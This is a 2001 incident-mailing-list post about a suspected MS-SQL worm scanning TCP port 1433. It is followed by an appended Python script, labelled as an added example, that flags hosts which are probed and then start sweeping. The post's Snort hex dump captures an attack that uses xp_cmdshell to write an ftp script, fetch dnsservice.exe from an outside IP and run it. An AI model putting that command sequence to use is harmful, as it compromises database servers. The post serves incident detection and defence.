Security Incidents mailing list archives

MS-SQL Worm?


From: "Douglas P. Brown" <dugbrown () email unc edu>
Date: Tue, 20 Nov 2001 09:54:18 -0500


We saw a scan come in looking for systems answering on 1433, and
immediately saw several systems start scanning out for other systems
answering on 1433 - worm behavior?  Has anyone else seen this?

thanks,
-Doug
-- 
Douglas P. Brown
University of North Carolina
Manager of Security Resources
105 Abernethy Hall


Nov 20 09:38:19 x.x.92.228:2884 -> x.x.90.70:1433 SYN ******S*
Nov 20 09:38:19 x.x.92.228:2886 -> x.x.92.70:1433 SYN ******S*
Nov 20 09:38:20 x.x.202.182:2503 -> x.x.73.109:1433 SYN ******S*
Nov 20 09:38:20 x.x.202.182:2507 -> x.x.77.109:1433 SYN ******S*
Nov 20 09:38:20 x.x.202.182:2506 -> x.x.76.109:1433 SYN ******S*
Nov 20 09:38:20 x.x.202.182:2528 -> x.x.96.109:1433 SYN ******S*
Nov 20 09:38:21 x.x.92.228:2904 -> x.x.110.70:1433 SYN ******S*
Nov 20 09:38:21 x.x.92.228:2905 -> x.x.111.70:1433 SYN ******S*
Nov 20 09:38:21 x.x.92.228:2906 -> x.x.112.70:1433 SYN ******S*
Nov 20 09:38:21 x.x.92.228:2907 -> x.x.113.70:1433 SYN ******S*
Nov 20 09:38:21 x.x.92.228:2909 -> x.x.115.70:1433 SYN ******S*
Nov 20 09:38:21 x.x.92.228:2908 -> x.x.114.70:1433 SYN ******S*
Nov 20 09:38:21 x.x.92.228:2910 -> x.x.116.70:1433 SYN ******S*
Nov 20 09:38:22 x.x.92.228:2911 -> x.x.117.70:1433 SYN ******S*
Nov 20 09:38:22 x.x.92.228:2913 -> x.x.119.70:1433 SYN ******S*
Nov 20 09:38:22 x.x.92.228:2912 -> x.x.118.70:1433 SYN ******S*
Nov 20 09:38:22 x.x.92.228:2915 -> x.x.121.70:1433 SYN ******S*
Nov 20 09:38:22 x.x.92.228:2914 -> x.x.120.70:1433 SYN ******S*
Nov 20 09:38:22 x.x.92.228:2916 -> x.x.122.70:1433 SYN ******S*
Nov 20 09:38:22 x.x.92.228:2917 -> x.x.123.70:1433 SYN ******S*
Nov 20 09:38:21 x.x.202.182:2532 -> x.x.99.109:1433 SYN ******S*
Nov 20 09:38:21 x.x.202.182:2533 -> x.x.100.109:1433 SYN ******S*
Nov 20 09:38:21 x.x.202.182:2535 -> x.x.102.109:1433 SYN ******S*
Nov 20 09:38:21 x.x.202.182:2538 -> x.x.105.109:1433 SYN ******S*
Nov 20 09:38:21 x.x.202.182:2539 -> x.x.106.109:1433 SYN ******S*

[**] MS-SQL xp_cmdshell - program execution [**]
11/20-08:01:48.923210 x.x.92.228:3348 -> x.x.200.115:1433
TCP TTL:127 TOS:0x0 ID:45385 IpLen:20 DgmLen:972 DF
***AP*** Seq: 0x318F3D1  Ack: 0x1E5807AD  Win: 0x2098  TcpLen: 20
03 01 03 A4 00 00 01 00 0A 00 73 00 70 00 5F 00  ..........s.p._.
70 00 72 00 65 00 70 00 61 00 72 00 65 00 00 00  p.r.e.p.a.r.e...
00 01 26 04 00 00 00 63 00 00 00 00 FF FF FF FF  ..&....c........
00 00 63 62 03 00 00 62 03 00 00 65 00 78 00 65  ..cb...b...e.x.e
00 63 00 20 00 78 00 70 00 5F 00 63 00 6D 00 64  .c. .x.p._.c.m.d
00 73 00 68 00 65 00 6C 00 6C 00 20 00 27 00 65  .s.h.e.l.l. .'.e
00 63 00 68 00 6F 00 20 00 66 00 74 00 70 00 3E  .c.h.o. .f.t.p.>
00 20 00 66 00 74 00 70 00 2E 00 78 00 27 00 0A  . .f.t.p...x.'..
00 65 00 78 00 65 00 63 00 20 00 78 00 70 00 5F  .e.x.e.c. .x.p._
00 63 00 6D 00 64 00 73 00 68 00 65 00 6C 00 6C  .c.m.d.s.h.e.l.l
00 20 00 27 00 65 00 63 00 68 00 6F 00 20 00 66  . .'.e.c.h.o. .f
00 6F 00 6F 00 2E 00 63 00 6F 00 6D 00 3E 00 3E  .o.o...c.o.m.>.>
00 20 00 66 00 74 00 70 00 2E 00 78 00 27 00 0A  . .f.t.p...x.'..
00 65 00 78 00 65 00 63 00 20 00 78 00 70 00 5F  .e.x.e.c. .x.p._
00 63 00 6D 00 64 00 73 00 68 00 65 00 6C 00 6C  .c.m.d.s.h.e.l.l
00 20 00 27 00 65 00 63 00 68 00 6F 00 20 00 62  . .'.e.c.h.o. .b
00 69 00 6E 00 3E 00 3E 00 20 00 66 00 74 00 70  .i.n.>.>. .f.t.p
00 2E 00 78 00 27 00 0A 00 65 00 78 00 65 00 63  ...x.'...e.x.e.c
00 20 00 78 00 70 00 5F 00 63 00 6D 00 64 00 73  . .x.p._.c.m.d.s
00 68 00 65 00 6C 00 6C 00 20 00 27 00 65 00 63  .h.e.l.l. .'.e.c
00 68 00 6F 00 20 00 63 00 64 00 20 00 70 00 75  .h.o. .c.d. .p.u
00 62 00 3E 00 3E 00 20 00 66 00 74 00 70 00 2E  .b.>.>. .f.t.p..
00 78 00 27 00 0A 00 65 00 78 00 65 00 63 00 20  .x.'...e.x.e.c.
00 78 00 70 00 5F 00 63 00 6D 00 64 00 73 00 68  .x.p._.c.m.d.s.h
00 65 00 6C 00 6C 00 20 00 27 00 65 00 63 00 68  .e.l.l. .'.e.c.h
00 6F 00 20 00 63 00 64 00 20 00 74 00 6D 00 70  .o. .c.d. .t.m.p
00 3E 00 3E 00 20 00 66 00 74 00 70 00 2E 00 78  .>.>. .f.t.p...x
00 27 00 0A 00 65 00 78 00 65 00 63 00 20 00 78  .'...e.x.e.c. .x
00 70 00 5F 00 63 00 6D 00 64 00 73 00 68 00 65  .p._.c.m.d.s.h.e
00 6C 00 6C 00 20 00 27 00 65 00 63 00 68 00 6F  .l.l. .'.e.c.h.o
00 20 00 67 00 65 00 74 00 20 00 64 00 6E 00 73  . .g.e.t. .d.n.s
00 73 00 65 00 72 00 76 00 69 00 63 00 65 00 2E  .s.e.r.v.i.c.e..
00 65 00 78 00 65 00 3E 00 3E 00 20 00 66 00 74  .e.x.e.>.>. .f.t
00 70 00 2E 00 78 00 27 00 0A 00 65 00 78 00 65  .p...x.'...e.x.e
00 63 00 20 00 78 00 70 00 5F 00 63 00 6D 00 64  .c. .x.p._.c.m.d
00 73 00 68 00 65 00 6C 00 6C 00 20 00 27 00 65  .s.h.e.l.l. .'.e
00 63 00 68 00 6F 00 20 00 63 00 6C 00 6F 00 73  .c.h.o. .c.l.o.s
00 65 00 20 00 3E 00 3E 00 20 00 66 00 74 00 70  .e. .>.>. .f.t.p
00 2E 00 78 00 27 00 0A 00 65 00 78 00 65 00 63  ...x.'...e.x.e.c
00 20 00 78 00 70 00 5F 00 63 00 6D 00 64 00 73  . .x.p._.c.m.d.s
00 68 00 65 00 6C 00 6C 00 20 00 27 00 65 00 63  .h.e.l.l. .'.e.c
00 68 00 6F 00 20 00 71 00 75 00 69 00 74 00 20  .h.o. .q.u.i.t.
00 3E 00 3E 00 20 00 66 00 74 00 70 00 2E 00 78  .>.>. .f.t.p...x
00 27 00 0A 00 65 00 78 00 65 00 63 00 20 00 78  .'...e.x.e.c. .x
00 70 00 5F 00 63 00 6D 00 64 00 73 00 68 00 65  .p._.c.m.d.s.h.e
00 6C 00 6C 00 20 00 27 00 66 00 74 00 70 00 20  .l.l. .'.f.t.p.
00 2D 00 73 00 3A 00 66 00 74 00 70 00 2E 00 78  .-.s.:.f.t.p...x
00 20 00 32 00 30 00 37 00 2E 00 32 00 39 00 2E  . .2.0.7...2.9..
00 31 00 39 00 32 00 2E 00 31 00 36 00 30 00 27  .1.9.2...1.6.0.'
00 0A 00 65 00 78 00 65 00 63 00 20 00 78 00 70  ...e.x.e.c. .x.p
00 5F 00 63 00 6D 00 64 00 73 00 68 00 65 00 6C  ._.c.m.d.s.h.e.l
00 6C 00 20 00 27 00 64 00 65 00 6C 00 20 00 66  .l. .'.d.e.l. .f
00 74 00 70 00 2E 00 78 00 27 00 0A 00 65 00 78  .t.p...x.'...e.x
00 65 00 63 00 20 00 78 00 70 00 5F 00 63 00 6D  .e.c. .x.p._.c.m
00 64 00 73 00 68 00 65 00 6C 00 6C 00 20 00 27  .d.s.h.e.l.l. .'
00 73 00 74 00 61 00 72 00 74 00 20 00 64 00 6E  .s.t.a.r.t. .d.n
00 73 00 73 00 65 00 72 00 76 00 69 00 63 00 65  .s.s.e.r.v.i.c.e
00 2E 00 65 00 78 00 65 00 27 00 0A 00 00 00 38  ...e.x.e.'.....8
01 00 00 00                                      ....

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com
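The pattern Doug describes (a host is probed on TCP/1433 and shortly afterwards starts sweeping port 1433 itself) can be pulled out of a SYN log in the format shown above. The following detector is an added example, not part of the original post or of any SecurityFocus tooling; the log lines it runs on are constructed with RFC 5737 test addresses, and the regex also accepts the masked `x.x.92.228` form used in the post.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample in the format of the SYN log above (RFC 5737 test
# addresses, not real hosts): 203.0.113.9 probes two internal hosts on 1433,
# and within a minute 192.0.2.70 starts its own sweep of port 1433.
SAMPLE_LOG = """\
Nov 20 09:37:50 203.0.113.9:4011 -> 192.0.2.70:1433 SYN ******S*
Nov 20 09:37:50 203.0.113.9:4012 -> 192.0.2.71:1433 SYN ******S*
Nov 20 09:38:19 192.0.2.70:2884 -> 198.51.100.70:1433 SYN ******S*
Nov 20 09:38:19 192.0.2.70:2886 -> 198.51.100.71:1433 SYN ******S*
Nov 20 09:38:21 192.0.2.70:2904 -> 198.51.100.72:1433 SYN ******S*
Nov 20 09:38:21 192.0.2.70:2905 -> 198.51.100.73:1433 SYN ******S*
Nov 20 09:38:21 192.0.2.70:2906 -> 198.51.100.74:1433 SYN ******S*
Nov 20 09:40:00 192.0.2.71:1055 -> 192.0.2.80:1433 SYN ******S*
"""

# "Nov 20 09:38:19 src:port -> dst:port SYN ..." ; host fields may be masked
LINE_RE = re.compile(r"^(\w{3} +\d+ \d\d:\d\d:\d\d) (\S+):\d+ -> (\S+):(\d+) SYN")

def parse(log, year=2001):
    """Yield (timestamp, src, dst) for every SYN to TCP/1433 in the log."""
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if m and m.group(4) == "1433":
            ts = datetime.strptime(f"{year} {m.group(1)}", "%Y %b %d %H:%M:%S")
            yield ts, m.group(2), m.group(3)

def find_worm_chain(log, min_targets=4, window_s=600):
    """Return {scanner: prober} for hosts that were first hit on 1433 and then,
    within window_s seconds, sent SYNs to >= min_targets distinct hosts on 1433.
    A host that only scans (never probed itself) is not reported here."""
    events = sorted(parse(log))
    first_probe = {}                  # victim -> (time it was first probed, prober)
    targets = defaultdict(set)        # suspected victim -> hosts it has swept
    flagged = {}
    for ts, src, dst in events:
        first_probe.setdefault(dst, (ts, src))
        if src in first_probe and (ts - first_probe[src][0]).total_seconds() <= window_s:
            targets[src].add(dst)
            if len(targets[src]) >= min_targets:
                flagged[src] = first_probe[src][1]
    return flagged

if __name__ == "__main__":
    print(find_worm_chain(SAMPLE_LOG))   # {'192.0.2.70': '203.0.113.9'}
```

Hosts it returns are the ones to pull off the network and check for the xp_cmdshell activity shown in the Snort alert; the external prober is deliberately left out so the output lists only suspected victims.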
